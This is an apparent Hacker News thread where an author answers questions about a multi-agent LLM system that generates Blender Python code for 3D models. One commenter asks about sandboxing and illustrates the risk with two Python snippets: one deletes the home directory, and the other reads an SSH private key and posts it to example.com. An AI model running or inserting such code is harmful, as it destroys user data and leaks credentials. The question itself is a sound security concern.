Remix.run Logo
ranahanocka 4 days ago

Author here. AMA!

panzi 2 days ago | parent | next [-]

Do you execute the Python code directly in Blender or do you perform some sort of sandboxing? How do you make sure that the code only contains save instructions and doesn't do something like this?

    import os, shutil
    shutil.rmtree(os.getenv("HOME"))
Or this?

    import os
    from urllib import request
    data = open(os.getenv("HOME")+"/.ssh/id_rsa").read()
    req = request.Request("http://example.com/", data=data.encode())
    reqest.urlopen(req)
GistNoesis 4 days ago | parent | prev | next [-]

How would you go to make the llm generate object easier to 3d print (or manufacture)? Things like not using too much material, reducing the need for support, and maybe whether or not the produced part would be tough enough.

Are there some datasets where some LLM learn to interact with some slicers, some Finite Elements Analysis software, or even real world 3d-printed objects to allow the model to do some quality assessment ?

ranahanocka 4 days ago | parent [-]

Interesting idea. Our framework of having multiple different agents with different roles could play well with this. You could create an agent that checks for certain criteria, gives feedback to the coding agent. For example, you could build an agent that evaluates the toughness of the current 3D asset and suggests fixes. I like the idea of incorporating additional experts to solve different tasks!

dvdplm 4 days ago | parent | prev | next [-]

I like the idea of llms collaborating like this a lot; planning, critiquing, verifying, coding etc. I think that’s a very general and powerful approach. How did you end up with that structure and what did you try first? What are the downsides? How do the component agents communicate, just json?

ranahanocka 4 days ago | parent [-]

The agents communicate through different paths. First, there's a "big boss" orchestrator that decides who speaks next. The outputs from all agents (including the code from the coding agent) is put into a shared context that each agent can draw from. Practically speaking, to make this happen we use AutoGen framework.

We slowly started building more and more agents. Everything we tried just worked (kinda amazing). We first started by trying to incorporate visual understanding via VLMs. Then we slowly added more and more agents, and the BlenderRAG gave a huge boost.

rapjr9 4 days ago | parent | prev [-]

Could this produce a 3D model of a plastic case that will perfectly fit a PCB board? Could it be improved to also produce the CAD files for a PCB board?